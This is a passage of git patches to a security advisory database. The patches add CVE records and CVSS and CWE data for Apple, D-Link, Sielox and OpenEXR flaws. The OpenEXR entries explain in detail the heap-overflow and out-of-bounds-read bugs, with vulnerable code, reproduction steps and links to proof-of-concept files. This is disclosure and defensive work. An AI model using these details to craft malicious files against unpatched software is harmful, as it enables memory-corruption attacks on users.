"github_reviewed_at": null, + "nvd_published_at": "2025-07-31T16:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-vq3r-vchr-9x6p/GHSA-vq3r-vchr-9x6p.json b/advisories/unreviewed/2025/07/GHSA-vq3r-vchr-9x6p/GHSA-vq3r-vchr-9x6p.json index 99ecb2b8aa306..7239f4c1839e3 100644 --- a/advisories/unreviewed/2025/07/GHSA-vq3r-vchr-9x6p/GHSA-vq3r-vchr-9x6p.json +++ b/advisories/unreviewed/2025/07/GHSA-vq3r-vchr-9x6p/GHSA-vq3r-vchr-9x6p.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-vq3r-vchr-9x6p", - "modified": "2025-07-30T00:32:23Z", + "modified": "2025-07-31T18:32:02Z", "published": "2025-07-30T00:32:23Z", "aliases": [ "CVE-2025-43251" ], "details": "An authorization issue was addressed with improved state management. This issue is fixed in macOS Sequoia 15.6. A local attacker may gain access to Keychain items.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-863" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:36Z" diff --git a/advisories/unreviewed/2025/07/GHSA-vrfh-8v52-6452/GHSA-vrfh-8v52-6452.json b/advisories/unreviewed/2025/07/GHSA-vrfh-8v52-6452/GHSA-vrfh-8v52-6452.json index 2389e55281739..5a37df0454eb4 100644 --- a/advisories/unreviewed/2025/07/GHSA-vrfh-8v52-6452/GHSA-vrfh-8v52-6452.json +++ b/advisories/unreviewed/2025/07/GHSA-vrfh-8v52-6452/GHSA-vrfh-8v52-6452.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-vrfh-8v52-6452", - "modified": "2025-07-31T00:31:04Z", + "modified": "2025-07-31T18:31:59Z", "published": "2025-07-30T00:32:20Z", "aliases": [ "CVE-2025-31277" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in watchOS 11.6, visionOS 2.6, iOS 18.6 and iPadOS 18.6, macOS Sequoia 15.6, tvOS 18.6. Processing maliciously crafted web content may lead to memory corruption.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -40,8 +45,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:30Z" diff --git a/advisories/unreviewed/2025/07/GHSA-w369-vj2v-c2xc/GHSA-w369-vj2v-c2xc.json b/advisories/unreviewed/2025/07/GHSA-w369-vj2v-c2xc/GHSA-w369-vj2v-c2xc.json index 20cb82d757d17..d30535117fa88 100644 --- a/advisories/unreviewed/2025/07/GHSA-w369-vj2v-c2xc/GHSA-w369-vj2v-c2xc.json +++ b/advisories/unreviewed/2025/07/GHSA-w369-vj2v-c2xc/GHSA-w369-vj2v-c2xc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-w369-vj2v-c2xc", - "modified": "2025-07-30T00:32:23Z", + "modified": "2025-07-31T18:32:02Z", "published": "2025-07-30T00:32:23Z", "aliases": [ "CVE-2025-43277" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in iOS 18.6 and iPadOS 18.6, watchOS 11.6, macOS Sequoia 15.6, tvOS 18.6, visionOS 2.6. Processing a maliciously crafted audio file may lead to memory corruption.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -36,8 +41,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:38Z" diff --git a/advisories/unreviewed/2025/07/GHSA-w5m4-3739-7jcj/GHSA-w5m4-3739-7jcj.json b/advisories/unreviewed/2025/07/GHSA-w5m4-3739-7jcj/GHSA-w5m4-3739-7jcj.json new file mode 100644 index 0000000000000..176850c766f20 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-w5m4-3739-7jcj/GHSA-w5m4-3739-7jcj.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w5m4-3739-7jcj", + "modified": "2025-07-31T18:32:04Z", + "published": "2025-07-31T18:32:04Z", + "aliases": [ + "CVE-2025-54832" + ], + "details": "OPEXUS FOIAXpress Public Access Link (PAL), version v11.1.0, allows an authenticated user to add entries to the list of states and territories.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54832" + }, + { + "type": "WEB", + "url": "https://docs.opexustech.com/docs/foiaxpress/11.12.0/FOIAXpress_Release_notes_11.12.3.0.pdf" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-174-01.json" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-54832" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-472" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T18:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-w694-7r6q-q7vv/GHSA-w694-7r6q-q7vv.json b/advisories/unreviewed/2025/07/GHSA-w694-7r6q-q7vv/GHSA-w694-7r6q-q7vv.json index bf474f90dad55..d788f76d58c1b 100644 --- a/advisories/unreviewed/2025/07/GHSA-w694-7r6q-q7vv/GHSA-w694-7r6q-q7vv.json +++ b/advisories/unreviewed/2025/07/GHSA-w694-7r6q-q7vv/GHSA-w694-7r6q-q7vv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w694-7r6q-q7vv", - "modified": "2025-07-18T12:30:35Z", + "modified": "2025-07-31T18:31:58Z", "published": "2025-07-18T12:30:35Z", "aliases": [ "CVE-2025-49484" @@ -26,6 +26,10 @@ { "type": "WEB", "url": "https://joomsky.com/js-jobs-joomla" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/52373" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/07/GHSA-wm47-xw3j-cmfh/GHSA-wm47-xw3j-cmfh.json b/advisories/unreviewed/2025/07/GHSA-wm47-xw3j-cmfh/GHSA-wm47-xw3j-cmfh.json index 9251319739f6f..6c1ec0ae919d6 100644 --- a/advisories/unreviewed/2025/07/GHSA-wm47-xw3j-cmfh/GHSA-wm47-xw3j-cmfh.json +++ b/advisories/unreviewed/2025/07/GHSA-wm47-xw3j-cmfh/GHSA-wm47-xw3j-cmfh.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wm47-xw3j-cmfh", - "modified": "2025-07-30T00:32:23Z", + "modified": "2025-07-31T18:32:02Z", "published": "2025-07-30T00:32:23Z", "aliases": [ "CVE-2025-43273" ], "details": "A permissions issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Sequoia 15.6. A sandboxed process may be able to circumvent sandbox restrictions.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-693" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:38Z" diff --git a/advisories/unreviewed/2025/07/GHSA-wqcc-7crj-3p76/GHSA-wqcc-7crj-3p76.json b/advisories/unreviewed/2025/07/GHSA-wqcc-7crj-3p76/GHSA-wqcc-7crj-3p76.json new file mode 100644 index 0000000000000..74e1b95fb8d81 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-wqcc-7crj-3p76/GHSA-wqcc-7crj-3p76.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wqcc-7crj-3p76", + "modified": "2025-07-31T18:32:04Z", + "published": "2025-07-31T18:32:04Z", + "aliases": [ + "CVE-2025-51385" + ], + "details": "D-LINK DI-8200 16.07.26A1 is vulnerable to Buffer Overflow in the yyxz_dlink_asp function via the id parameter.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51385" + }, + { + "type": "WEB", + "url": "https://github.com/draw-hub/zMeedA/blob/master/CVE-2025-51385.md" + }, + { + "type": "WEB", + "url": "https://www.dlink.com/en/security-bulletin" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T18:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-wr2x-xq5x-p5vf/GHSA-wr2x-xq5x-p5vf.json b/advisories/unreviewed/2025/07/GHSA-wr2x-xq5x-p5vf/GHSA-wr2x-xq5x-p5vf.json new file mode 100644 index 0000000000000..30611575120e2 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-wr2x-xq5x-p5vf/GHSA-wr2x-xq5x-p5vf.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wr2x-xq5x-p5vf", + "modified": "2025-07-31T18:32:04Z", + "published": "2025-07-31T18:32:04Z", + "aliases": [ + "CVE-2024-34327" + ], + "details": "Sielox AnyWare v2.1.2 was discovered to contain a SQL injection vulnerability via the email address field of the password reset form.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34327" + }, + { + "type": "WEB", + "url": "https://github.com/0xsu3ks/CVE-2024-34327" + }, + { + "type": "WEB", + "url": "https://sielox.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T17:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-wvw8-3gm3-qgrg/GHSA-wvw8-3gm3-qgrg.json b/advisories/unreviewed/2025/07/GHSA-wvw8-3gm3-qgrg/GHSA-wvw8-3gm3-qgrg.json index 0949cfef5e720..b3a7bc081b05a 100644 --- a/advisories/unreviewed/2025/07/GHSA-wvw8-3gm3-qgrg/GHSA-wvw8-3gm3-qgrg.json +++ b/advisories/unreviewed/2025/07/GHSA-wvw8-3gm3-qgrg/GHSA-wvw8-3gm3-qgrg.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wvw8-3gm3-qgrg", - "modified": "2025-07-31T00:31:04Z", + "modified": "2025-07-31T18:31:59Z", "published": "2025-07-30T00:32:19Z", "aliases": [ "CVE-2025-31273" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in macOS Sequoia 15.6, iOS 18.6 and iPadOS 18.6, tvOS 18.6, watchOS 11.6, visionOS 2.6. Processing maliciously crafted web content may lead to memory corruption.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -40,8 +45,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:30Z" diff --git a/advisories/unreviewed/2025/07/GHSA-xmf4-pwcw-hwqf/GHSA-xmf4-pwcw-hwqf.json b/advisories/unreviewed/2025/07/GHSA-xmf4-pwcw-hwqf/GHSA-xmf4-pwcw-hwqf.json index c510f774afc78..e8f984a637018 100644 --- a/advisories/unreviewed/2025/07/GHSA-xmf4-pwcw-hwqf/GHSA-xmf4-pwcw-hwqf.json +++ b/advisories/unreviewed/2025/07/GHSA-xmf4-pwcw-hwqf/GHSA-xmf4-pwcw-hwqf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xmf4-pwcw-hwqf", - "modified": "2025-07-30T00:32:20Z", + "modified": "2025-07-31T18:32:00Z", "published": "2025-07-30T00:32:20Z", "aliases": [ "CVE-2025-43184" ], "details": "This issue was addressed by adding an additional prompt for user consent. This issue is fixed in macOS Sonoma 14.7.7, macOS Ventura 13.7.7, macOS Sequoia 15.4. A shortcut may be able to bypass sensitive Shortcuts app settings.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-284" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:31Z" From 56cdd18522ffedf119d43fa6bb80994d28592125 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 31 Jul 2025 19:14:50 +0000 Subject: [PATCH 281/323] Publish GHSA-h45x-qhg2-q375 --- .../GHSA-h45x-qhg2-q375.json | 61 +++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 advisories/github-reviewed/2025/07/GHSA-h45x-qhg2-q375/GHSA-h45x-qhg2-q375.json diff --git a/advisories/github-reviewed/2025/07/GHSA-h45x-qhg2-q375/GHSA-h45x-qhg2-q375.json b/advisories/github-reviewed/2025/07/GHSA-h45x-qhg2-q375/GHSA-h45x-qhg2-q375.json new file mode 100644 index 0000000000000..a4ffd6052cc66 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-h45x-qhg2-q375/GHSA-h45x-qhg2-q375.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h45x-qhg2-q375", + "modified": "2025-07-31T19:12:57Z", + "published": "2025-07-31T19:12:56Z", + "aliases": [ + "CVE-2025-48071" + ], + "summary": "OpenEXR Heap-Based Buffer Overflow in Deep Scanline Parsing via Forged Unpacked Size", + "details": "### Summary\n\nThe OpenEXRCore code is vulnerable to a heap-based buffer overflow during a write operation when decompressing ZIPS-packed deep scan-line EXR files with a maliciously forged chunk header.\n\n### Details\nWhen parsing `STORAGE_DEEP_SCANLINE` chunks from an EXR file, the following code (from `src/lib/OpenEXRCore/chunk.c`) is used to extract the chunk information:\n\n```cpp\n\nif (part->storage_mode == EXR_STORAGE_DEEP_SCANLINE)\n// SNIP...\n cinfo->sample_count_data_offset = dataoff;\n cinfo->sample_count_table_size = (uint64_t) ddata[0];\n cinfo->data_offset = dataoff + (uint64_t) ddata[0];\n cinfo->packed_size = (uint64_t) ddata[1];\n cinfo->unpacked_size = (uint64_t) ddata[2];\n// SNIP...\n```\n\nBy storing this information, the code that will later decompress and reconstruct the chunk bytes, will know how much space the uncompressed data will occupy.\n\nThis size is carried along in the chain of decoding/decompression until the `undo_zip_impl` function in `src/lib/OpenEXRCore/internal_zip.c`:\n\n```cpp\nstatic exr_result_t\nundo_zip_impl (\n exr_decode_pipeline_t* decode,\n const void* compressed_data,\n uint64_t comp_buf_size,\n void* uncompressed_data,\n uint64_t uncompressed_size,\n void* scratch_data,\n uint64_t scratch_size)\n{\n size_t actual_out_bytes;\n exr_result_t res;\n\n if (scratch_size < uncompressed_size) return EXR_ERR_INVALID_ARGUMENT;\n\n res = exr_uncompress_buffer (\n decode->context,\n compressed_data,\n comp_buf_size,\n scratch_data,\n scratch_size,\n &actual_out_bytes);\n\n if (res == EXR_ERR_SUCCESS)\n {\n decode->bytes_decompressed = actual_out_bytes;\n if (comp_buf_size > actual_out_bytes)\n res = EXR_ERR_CORRUPT_CHUNK;\n else\n internal_zip_reconstruct_bytes (\n uncompressed_data, scratch_data, actual_out_bytes);\n }\n\n return res;\n}\n```\n\nThe `uncompressed_size` comes from the `unpacked_size` extracted earlier, and the `uncompressed_data` is a buffer allocated by making space for the size \"advertised\" in the chunk information.\n\nHowever, `scratch_data` and `actual_out_bytes` will contain, after decompression, the uncompressed data and its size, respectively. \n\nThe vulnerability lies in the fact that the `undo_zip_impl` function lacks code to check whether `actual_out_bytes` is greater than `uncompressed_size`. \n\nThe effect is that, by setting the `unpacked_size` in the chunk header smaller than the actual chunk decompressed data, it is possible - in the `internal_zip_reconstruct_bytes` function - to overflow past the boundaries of a heap chunk.\n\n### PoC\n\nNOTE: you can download the `heap_overflow.exr` file from this link:\n\nhttps://github.com/ShielderSec/poc/tree/main/CVE-2025-48071\n\n1. Compile the `exrcheck` binary in a macOS or GNU/Linux machine with ASAN.\n2. Open the `heap_overflow.exr` file with the following command:\n\n```\nexrcheck heap_overflow.exr\n```\n\n3. Notice that `exrcheck` crashes with an ASAN stack-trace.\n![image](https://github.com/user-attachments/assets/57907073-bc9f-40bb-9030-16008035ade8)\n\n### Impact\n\nAn attacker might exploit this vulnerability by feeding a maliciously crafted file to a program that uses the OpenEXR libraries, thus gaining the capability to write an arbitrary amount of bytes in the heap. This could potentially result in code execution in the process.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "OpenEXR" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.3.0" + }, + { + "fixed": "3.3.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-h45x-qhg2-q375" + }, + { + "type": "PACKAGE", + "url": "https://github.com/AcademySoftwareFoundation/openexr" + }, + { + "type": "WEB", + "url": "https://github.com/ShielderSec/poc/tree/main/CVE-2025-48071" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2025-07-31T19:12:56Z", + "nvd_published_at": null + } +} \ No newline at end of file From 1e96fbf50c0cde3078bdb73d7a3b94c58263e282 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 31 Jul 2025 19:21:58 +0000 Subject: [PATCH 282/323] Publish GHSA-4r7w-q3jg-ff43 --- .../GHSA-4r7w-q3jg-ff43.json | 64 +++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 advisories/github-reviewed/2025/07/GHSA-4r7w-q3jg-ff43/GHSA-4r7w-q3jg-ff43.json diff --git a/advisories/github-reviewed/2025/07/GHSA-4r7w-q3jg-ff43/GHSA-4r7w-q3jg-ff43.json b/advisories/github-reviewed/2025/07/GHSA-4r7w-q3jg-ff43/GHSA-4r7w-q3jg-ff43.json new file mode 100644 index 0000000000000..4f093d3c5fd1b --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-4r7w-q3jg-ff43/GHSA-4r7w-q3jg-ff43.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4r7w-q3jg-ff43", + "modified": "2025-07-31T19:20:05Z", + "published": "2025-07-31T19:20:05Z", + "aliases": [ + "CVE-2025-48072" + ], + "summary": "OpenEXR Out of Bounds Heap Read due to Bad Pointer Arithmetic in LossyDctDecoder_execute", + "details": "### Summary\nThe OpenEXRCore code is vulnerable to a heap-based buffer overflow during a read operation due to bad pointer math when decompressing DWAA-packed scan-line EXR files with a maliciously forged chunk.\n\n### Details\n\nIn the `LossyDctDecoder_execute` function (from `src/lib/OpenEXRCore/internal_dwa_decoder.h`, when SSE2 is enabled), the following code is used to copy data from the chunks:\n\n```cpp\n// no-op conversion to linear\nfor (int y = 8 * blocky; y < 8 * blocky + maxY; ++y)\n{\n __m128i* restrict dst = (__m128i *) chanData[comp]->_rows[y];\n __m128i const * restrict src = (__m128i const *)&rowBlock[comp][(y & 0x7) * 8];\n\n for (int blockx = 0; blockx < numFullBlocksX; ++blockx)\n {\n _mm_storeu_si128 (dst, _mm_loadu_si128 (src)); //\n\n src += 8 * 8; // <--- si128 pointer incremented as a uint16_t\n dst += 8;\n }\n}\n```\n\nThe issue arises because the `src` pointer, which is a `si128` pointer, is incremented by `8*8`, as if it were a `uint16_t` pointer (64 * uint16_t == 128 bytes). In non-block aligned chunks (width/height not a multiple of 8), this can cause `src` to point past the boundaries of the chunk.\n\n### PoC\n\nIn order to reproduce the PoC with fidelity and avoid undefined behaviors, it is necessary to enable ASAN (and SSE2). Otherwise the out-of-bound read will not be detected until its side-effect causes a crash.\n\nNOTE: please download the `dwadecoder_crash.exr` file from the following link: \n\nhttps://github.com/ShielderSec/poc/tree/main/CVE-2025-48072\n\n1. Compile the `exrcheck` binary in a macOS or GNU/Linux machine with ASAN.\n2. Open the `dwadecoder_crash.exr` file with the following command:\n\n```\nexrcheck dwadecoder_crash.exr\n```\n\n3. Notice that `exrcheck` crashes with ASAN stack-trace.\n\n```\n==2297956==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x52500000a110 at pc 0x55e590db7bf1 bp 0x7fff948bb110 sp 0x7fff948bb108\nREAD of size 16 at 0x52500000a110 thread T0\n #0 0x55e590db7bf0 in LossyDctDecoder_execute /root/openexr/src/lib/OpenEXRCore/internal_dwa_decoder.h:650:48\n #1 0x55e590dae18d in DwaCompressor_uncompress /root/openexr/src/lib/OpenEXRCore/internal_dwa_compressor.h:1132:30\n #2 0x55e590da9960 in internal_exr_undo_dwaa /root/openexr/src/lib/OpenEXRCore/internal_dwa.c:202:18\n #3 0x55e590d42d03 in exr_uncompress_chunk /root/openexr/src/lib/OpenEXRCore/compression.c:516:14\n #4 0x55e590dc3132 in exr_decoding_run /root/openexr/src/lib/OpenEXRCore/decoding.c:580:14\n #5 0x55e590c7d78f in Imf_3_4::(anonymous namespace)::ScanLineProcess::run_decode(_priv_exr_context_t const*, int, Imf_3_4::FrameBuffer const*, int, int, std::vector> const&) /root/openexr/src/lib/OpenEXR/ImfScanLineInputFile.cpp:585:23\n #6 0x55e590c83ed7 in Imf_3_4::ScanLineInputFile::Data::readPixels(Imf_3_4::FrameBuffer const&, int, int) /root/openexr/src/lib/OpenEXR/ImfScanLineInputFile.cpp:499:21\n #7 0x55e590c73c97 in Imf_3_4::ScanLineInputFile::readPixels(int, int) /root/openexr/src/lib/OpenEXR/ImfScanLineInputFile.cpp:306:12\n #8 0x55e590c73c97 in Imf_3_4::InputFile::Data::readPixels(int, int) /root/openexr/src/lib/OpenEXR/ImfInputFile.cpp:446:20\n #9 0x55e590c1f92f in Imf_3_4::InputFile::readPixels(int) /root/openexr/src/lib/OpenEXR/ImfInputFile.cpp:228:12\n #10 0x55e590c1f92f in Imf_3_4::InputPart::readPixels(int) /root/openexr/src/lib/OpenEXR/ImfInputPart.cpp:70:11\n #11 0x55e590c1f92f in bool Imf_3_4::(anonymous namespace)::readScanline(Imf_3_4::InputPart&, bool, bool) /root/openexr/src/lib/OpenEXRUtil/ImfCheckFile.cpp:239:20\n #12 0x55e590c1f92f in Imf_3_4::(anonymous namespace)::readMultiPart(Imf_3_4::MultiPartInputFile&, bool, bool) /root/openexr/src/lib/OpenEXRUtil/ImfCheckFile.cpp:879:28\n #13 0x55e590c155af in bool Imf_3_4::(anonymous namespace)::runChecks(char const*&, bool, bool) /root/openexr/src/lib/OpenEXRUtil/ImfCheckFile.cpp:1132:21\n #14 0x55e590c155af in Imf_3_4::checkOpenEXRFile(char const*, bool, bool, bool) /root/openexr/src/lib/OpenEXRUtil/ImfCheckFile.cpp:1796:19\n #15 0x55e590ba5abe in exrCheck(char const*, bool, bool, bool, bool) /root/openexr/src/bin/exrcheck/main.cpp:96:16\n #16 0x55e590ba6fbe in main /root/openexr/src/bin/exrcheck/main.cpp:164:29\n #17 0x7f4259e2a1c9 in __libc_start_call_main csu/../sysdeps/npthttps://gitlab.com/qemu-project/qemu/-/issuesl/libc_start_call_main.h:58:16\n #18 0x7f4259e2a28a in __libc_start_main csu/../csu/libc-start.c:360:3\n #19 0x55e590ac67d4 in _start (/root/openexr/_build_afl_asan/bin/exrcheck+0x1d87d4) (BuildId: 49c2658b2f9ddef9)\n\n0x52500000a110 is located 752 bytes after 9504-byte region [0x525000007900,0x525000009e20)\nallocated by thread T0 here:\n #0 0x55e590b61623 in malloc (/root/openexr/_build_afl_asan/bin/exrcheck+0x273623) (BuildId: 49c2658b2f9ddef9)\n #1 0x55e590db11b1 in LossyDctDecoder_execute /root/openexr/src/lib/OpenEXRCore/internal_dwa_decoder.h:324:22\n #2 0x55e590dae18d in DwaCompressor_uncompress /root/openexr/src/lib/OpenEXRCore/internal_dwa_compressor.h:1132:30\n #3 0x55e590da9960 in internal_exr_undo_dwaa /root/openexr/src/lib/OpenEXRCore/internal_dwa.c:202:18\n #4 0x55e590d42d03 in exr_uncompress_chunk /root/openexr/src/lib/OpenEXRCore/compression.c:516:14\n```\n\n### Impact\nAn attacker could crash the application and in some scenarios also leak data, such as sensitive information or memory addresses that might be used to bypass exploitation mitigations like ASLR.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "OpenEXR" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.3.2" + }, + { + "fixed": "3.3.3" + } + ] + } + ], + "versions": [ + "3.3.2" + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-4r7w-q3jg-ff43" + }, + { + "type": "PACKAGE", + "url": "https://github.com/AcademySoftwareFoundation/openexr" + }, + { + "type": "WEB", + "url": "https://github.com/ShielderSec/poc/tree/main/CVE-2025-48072" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-07-31T19:20:05Z", + "nvd_published_at": null + } +} \ No newline at end of file From 0930611f9c41f3779d70848e5d737e95f8d3e233 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 31 Jul 2025 19:24:28 +0000 Subject: [PATCH 283/323] Publish Advisories GHSA-qhpm-86v7-phmm GHSA-x22w-82jp-8rvf --- .../GHSA-qhpm-86v7-phmm.json | 64 +++++++++++++++++++ .../GHSA-x22w-82jp-8rvf.json | 64 +++++++++++++++++++ 2 files changed, 128 insertions(+) create mode 100644 advisories/github-reviewed/2025/07/GHSA-qhpm-86v7-phmm/GHSA-qhpm-86v7-phmm.json create mode 100644 advisories/github-reviewed/2025/07/GHSA-x22w-82jp-8rvf/GHSA-x22w-82jp-8rvf.json diff --git a/advisories/github-reviewed/2025/07/GHSA-qhpm-86v7-phmm/GHSA-qhpm-86v7-phmm.json b/advisories/github-reviewed/2025/07/GHSA-qhpm-86v7-phmm/GHSA-qhpm-86v7-phmm.json new file mode 100644 index 0000000000000..c922f6be31b73 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-qhpm-86v7-phmm/GHSA-qhpm-86v7-phmm.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qhpm-86v7-phmm", + "modified": "2025-07-31T19:21:35Z", + "published": "2025-07-31T19:21:35Z", + "aliases": [ + "CVE-2025-48073" + ], + "summary": "OpenEXR ScanLineProcess::run_fill NULL Pointer Write In \"reduceMemory\" Mode", + "details": "### Summary\n\nWhen reading a deep scanline image with a large sample count in `reduceMemory` mode, it is possible to crash a target application with a NULL pointer dereference in a write operation.\n\n### Details\n\nIn the `ScanLineProcess::run_fill` function, implemented in `src/lib/OpenEXR/ImfDeepScanLineInputFile.cpp`, the following code is used to write the `fillValue` in the sample buffer:\n\n```cpp\n switch (fills.type)\n {\n case OPENEXR_IMF_INTERNAL_NAMESPACE::UINT:\n {\n unsigned int fillVal = (unsigned int) (fills.fillValue);\n unsigned int* fillptr = static_cast (dest);\n\n for ( int32_t s = 0; s < samps; ++s )\n fillptr[s] = fillVal; // <--- POTENTIAL CRASH HERE\n break;\n }\n```\n\nHowever, when `reduceMemory` mode is enabled in the `readDeepScanLine` function in `src/lib/OpenEXRUtil/ImfCheckFile.cpp`, with large sample counts, the sample data will not be read, as shown below:\n\n```cpp\n // limit total number of samples read in reduceMemory mode\n //\n if (!reduceMemory ||\n fileBufferSize + bufferSize < gMaxBytesPerDeepScanline) // <--- CHECK ON LARGE SAMPLE COUNTS AND reduceMemory\n {\n // SNIP...\n try\n {\n in.readPixels (y);\n 